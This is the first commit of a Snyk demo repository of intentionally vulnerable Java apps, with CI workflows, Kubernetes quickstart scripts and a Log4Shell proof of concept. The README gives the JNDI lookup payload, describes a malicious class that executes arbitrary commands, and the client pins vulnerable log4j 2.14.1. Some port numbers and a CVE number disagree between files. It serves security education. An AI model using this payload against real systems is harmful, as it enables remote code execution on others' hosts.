first commit

Author: Robthreefold

.github/CODEOWNERS

@@ -0,0 +1 @@
+* @snyk/devrel

.github/workflows/log4shell-goof-server-docker-image.yaml

@@ -0,0 +1,70 @@
+name: log4shell-goof-server Docker image build and test
+
+on:
+  push:
+    branches:
+      - 'main'
+    paths:
+      - 'log4shell-goof/log4shell-goof-server/**'
+      - '.github/workflows/log4shell-goof-server-docker-image.yaml'
+  pull_request:
+    branches:
+      - 'main'
+    paths:
+      - 'log4shell-goof/log4shell-goof-server/**'
+      - '.github/workflows/log4shell-goof-server-docker-image.yaml'
+jobs:
+
+  build-log4shell-server-image:
+    runs-on: ubuntu-latest
+    defaults:
+      run:
+        working-directory: log4shell-goof/log4shell-server
+    steps:
+      - uses: actions/checkout@v2
+
+      - name: Set up Docker Buildx
+        uses: docker/setup-buildx-action@v1
+
+      - name: Build
+        uses: docker/build-push-action@v2
+        with:
+          load: true
+          context: log4shell-goof/log4shell-server
+          push: false
+          tags: log4shell-server:latest
+
+      - name: Run container
+        run: docker run -d --rm --name log4shell-server log4shell-server:latest && sleep 5
+
+      - name: Smoke test LDAP running in container
+        run: docker logs log4shell-server | grep "LDAP server listening on 0.0.0.0:8000"
+
+      - name: Smoke test HTTP running in container
+        run: docker logs log4shell-server | grep "HTTP server listening on 0.0.0.0:9999"
+
+      - name: Cleanup container
+        run: docker kill log4shell-server
+
+      - name: Start minikube
+        uses: medyagh/setup-minikube@master
+        with:
+          cni: calico
+
+      - name: Deploy to minikube
+        run: |
+          sed -i 's/${DOCKER_ACCOUNT}\///' k8s/deploy.yaml
+          sed -i 's/imagePullPolicy: Always/imagePullPolicy: Never/' k8s/deploy.yaml
+          minikube image load log4shell-server:latest
+          kubectl apply -f k8s/deploy.yaml
+
+      - name: Test pods came up cleanly
+        run: |
+          kubectl get all --namespace=darkweb && \
+          kubectl wait --namespace=darkweb --for=condition=ready pod --selector=app=log4shell --timeout=90s
+
+      - name: Dump pod description
+        if: ${{ failure() }}
+        run: |
+          kubectl describe pod --namespace=darkweb --selector=app=log4shell
+          kubectl describe deploy --namespace=darkweb --selector=app=log4shell

.github/workflows/todolist-goof-docker-image.yaml

@@ -0,0 +1,65 @@
+name: todolist-goof Docker image build and test
+
+on:
+  push:
+    branches:
+      - 'main'
+    paths:
+      - 'todolist-goof/**'
+      - '.github/workflows/todolist-goof-docker-image.yaml'
+  pull_request:
+    branches:
+      - 'main'
+    paths:
+      - 'todolist-goof/**'
+      - '.github/workflows/todolist-goof-docker-image.yaml'
+
+jobs:
+  build-todolist-image:
+    runs-on: ubuntu-latest
+    defaults:
+      run:
+        working-directory: todolist-goof
+    steps:
+      - uses: actions/checkout@v2
+
+      - name: Set up Docker Buildx
+        uses: docker/setup-buildx-action@v1
+
+      - name: Build
+        uses: docker/build-push-action@v2
+        with:
+          load: true
+          context: todolist-goof
+          push: false
+          tags: java-goof:latest
+
+      - name: Run container
+        run: docker run -d --rm --name java-goof -p 8080:8080 java-goof:latest
+
+      - name: Smoke test container
+        run: sleep 5 && curl -s --retry 5 --retry-delay 1 --retry-max-time 30 http://localhost:8080/todolist/ 
+
+      - name: Teardown container
+        run: docker kill java-goof
+
+      - name: Start minikube
+        uses: medyagh/setup-minikube@master
+        with:
+          cni: calico
+
+      - name: Deploy to minikube
+        run: |
+          sed -i 's/${DOCKER_ACCOUNT}\///' k8s/java-goof.yaml
+          sed -i 's/imagePullPolicy: Always/imagePullPolicy: Never/' k8s/java-goof.yaml
+          minikube image load java-goof:latest
+          kubectl apply -f k8s/java-goof.yaml
+
+      - name: Test pod came up cleanly
+        run: |
+          kubectl get all
+          kubectl wait --for=condition=ready pod --selector=app=goof --timeout=90s
+
+      - name: Dump pod description
+        if: ${{ failure() }}
+        run: kubectl describe pod --selector=app=goof

.gitignore

@@ -0,0 +1,4 @@
+*.iml
+.idea
+**/target/**
+**/.DS_Store

README-K8S.md

@@ -0,0 +1,47 @@
+# Kubernetes based Todolist + Log4Shell exploit
+To deploy Todolist on Kubernetes along with the needed ldap backend for exploiting the Log4shell
+vulnerability:
+
+## Prerequisites
+1. A kubernetes cluster where you have permissions to create namespaces, deployments and services
+2. The `kubectl` client and credenials configuration
+3. Docker Desktop or docker-ce (for building and pushing images)
+4. A DockerHub account that you are logged in with at the command prompt (via `docker login`)
+
+## Quickstart
+Assuming you have your kubernetes cluster up and ready, from the top level of this repo you can run `./k8s-quickstart.sh` which will do the following:
+1. Builds todolist-goof image and pushes it to Docker Hub. _(see below for account/tagging info)_
+2. Deploys the todolist to the `default` namespace in your kubernetes cluster along with a LoadBalancer type service
+3. Builds the log4shell-server image and pushes to Docker Hub. _(see below for account/tagging info)_
+4. Deploys the log4shell-server and a pair of ClusterIP type services into a new namespace named `darkweb` in your Kubernetes cluster.
+
+NOTE: You will be prompted for your DockerHub account in order for the scripts to tag, push and pull the images.
+If you set and environmental variable named `DOCKER_ACCOUNT` to that account name, the script will pre-populate that prompt with it.
+```bash
+export DOCKER_ACCOUNT="yourdockeraccount"
+```
+## Accessing the application
+Once complete, run `kubectl get svc` and note the IP Address or hostname of the `goof` service.
+
+You should be able to open a browser to http://{svc-ip-addr}/todolist and see the app
+
+#### EKS cluster notes
+* In order to perform NetworkPolicy egress examples, you will need to deploy the Calico CNI plugin as EKS does not implement NetworkPolicy by default.
+  The `eks-calico.sh` script in `todolist-goof/k8s` will deploy this for you. (that script is sym-linked to the top level here too)
+* You should log into the AWS console and change inbound access for the good service's ELB to only allow your home IP, otherwise you *will* have audience members trying to mess with it.
+
+#### Docker Desktop Kubernetes notes
+* Docker Desktop automatically serves the goof service loadblancer external IP to your workstation's localhost so the app will be available at http://localhost/todolist
+* Docker Desktop Kubernetes CNI does not implement Network Policy so you will not be able to demonstrate any mitigation techniques that use that.
+
+#### Kind (Kubernetes on Docker) notes
+* Kind's default CNI does not currently support Network Policy so you should deploy your own using the instructions on their website.
+* If running Kind on top of Docker Desktop, you will need to run a port-forward to access the app.  For example, use something like this: `kubectl port-forward service/goof 8000:80` and then access it via browser at http://localhost:8000/todolist
+
+## Quick cleanup
+Run the `/.k8s-quickstop.sh` script at the top level of this repo which will do the following:
+1. Deletes the todolist deployment and associated service in the `default` namespace
+2. Deletes the log4shell deployment and associated services in the `darkweb` namespace and deltes the namespace as well
+   **Note:** This will not delete any additional objects you may have deployed such as NetworkPolicies.
+
+It is up to you to shut down your Kubernetes cluster as appropriate.

README.md

@@ -0,0 +1,9 @@
+## Java Goof
+
+This is a collection of Java demo apps that are vulnerable in different ways.
+
+It's divided into modules, each one having its own README:
+
+* [Todolist Goof](todolist-goof/README.md)
+* [Log4Shell Goof](log4shell-goof/README.md)
+* [Quickstart for running both Todolist with Log4Shell in Kubernetes](README-K8S.md)

eks-calico.sh

@@ -0,0 +1 @@
+todolist-goof/k8s/eks-calico.sh

k8s-quickstart.sh

@@ -0,0 +1,10 @@
+#!/usr/bin/env bash
+TOP_LEVEL_MYDIR=$(dirname $0)
+if [[ "$1" == "" ]]; then
+  read -e -i "${DOCKER_ACCOUNT}" -p "Please enter your DockerHub user/account name: " input
+  name="${input:-$DOCKER_ACCOUNT}"
+else
+  DOCKER_ACCOUNT=$1
+fi
+$TOP_LEVEL_MYDIR/todolist-goof/k8s/quickstart.sh $DOCKER_ACCOUNT
+$TOP_LEVEL_MYDIR/log4shell-goof/log4shell-server/k8s/quickstart.sh $DOCKER_ACCOUNT

k8s-quickstop.sh

@@ -0,0 +1,4 @@
+#!/usr/bin/env bash
+TOP_LEVEL_MYDIR=$(dirname $0)
+$TOP_LEVEL_MYDIR/todolist-goof/k8s/shutdown.sh
+$TOP_LEVEL_MYDIR/log4shell-goof/log4shell-server/k8s/shutdown.sh

kind-init.sh

@@ -0,0 +1 @@
+todolist-goof/k8s/kind-init.sh

log4shell-goof/README.md

@@ -0,0 +1,100 @@
+## Log4Shell Goof
+
+The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.
+
+**NOTE**: Multiple additional vulnerabilities have been disclosed with log4j. Make sure you're using the latest `2.17.x` version.
+
+This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
+The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.
+
+For more information about the exploit and the mechanics of how it works, 
+[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).
+
+### Requirements
+
+You'll need one of the following Java SDKs:
+  * 11.0.1 or earlier
+  * 8u191 or earlier
+  * 7u201 or earlier
+  * 6u211 or earlier
+
+Java SDKs newer than those versions don't have the same vulnerability.
+
+### Building the PoC
+
+In the root folder, run:
+
+```
+mvn clean install
+```
+
+**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.
+
+### Running the PoC
+
+This repo has two modules: server and client.
+
+The server module runs a lean LDAP & HTTP server.
+
+The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a
+Java class that will be deserialized and executed.
+
+The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`.
+
+`Evil` implements `ObjectFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While
+the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it
+writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine.
+
+This PoC should run as-is on Linux or Mac.
+
+Open a terminal window and run the following:
+
+```
+cd log4shell-server
+mvn exec:java
+```
+
+You should see output that looks like the following:
+
+```
+[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server ---
+LDAP server listening on 0.0.0.0:9999
+HTTP server listening on 0.0.0.0:8000
+```
+
+In another terminal window, run the following:
+
+```
+cd log4shell-client
+JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
+mvn exec:java
+```
+
+**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
+For example, you can download JDK 8u111 
+[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download
+and install the version for Mac, the above command will work for you.
+
+You should see output that looks like the following:
+
+```
+[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client ---
+---------- JVM Props -------------
+java.vm.version=25.111-b14
+java.vm.vendor=Oracle Corporation
+java.vm.name=Java HotSpot(TM) 64-Bit Server VM
+java.vm.specification.name=Java Virtual Machine Specification
+java.vm.specification.vendor=Oracle Corporation
+java.vm.specification.version=1.8
+java.vm.info=mixed mode
+---------------------------------
+20:27:49.676 [Main.main()] ERROR Main - test
+/tmp/pwned DOES NOT EXIST
+20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
+/tmp/pwned EXISTS - yah been pwned!
+```
+
+**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the 
+`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
+client app to work properly. The file not being there and then being present after the attack is how it knows it's
+been successful.

log4shell-goof/log4shell-client/pom.xml

@@ -0,0 +1,48 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <modelVersion>4.0.0</modelVersion>
+  <parent>
+    <artifactId>log4shell-poc</artifactId>
+    <groupId>io.snyk</groupId>
+    <version>0.0.1-SNAPSHOT</version>
+  </parent>
+
+  <artifactId>log4shell-client</artifactId>
+  <version>0.0.1-SNAPSHOT</version>
+
+  <name>Java Goof :: Log4Shell Goof :: Log4Shell Client</name>
+  <url>https://snyk.io</url>
+
+  <properties>
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    <maven.compiler.source>8</maven.compiler.source>
+    <maven.compiler.target>8</maven.compiler.target>
+  </properties>
+
+  <dependencies>
+    <dependency>
+      <groupId>org.apache.logging.log4j</groupId>
+      <artifactId>log4j-core</artifactId>
+      <version>2.14.1</version>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.logging.log4j</groupId>
+      <artifactId>log4j-api</artifactId>
+      <version>2.14.1</version>
+    </dependency>
+  </dependencies>
+
+  <build>
+    <plugins>
+      <plugin>
+        <groupId>org.codehaus.mojo</groupId>
+        <artifactId>exec-maven-plugin</artifactId>
+        <version>3.0.0</version>
+        <configuration>
+          <mainClass>Main</mainClass>
+          <cleanupDaemonThreads>false</cleanupDaemonThreads>
+        </configuration>
+      </plugin>
+    </plugins>
+  </build>
+</project>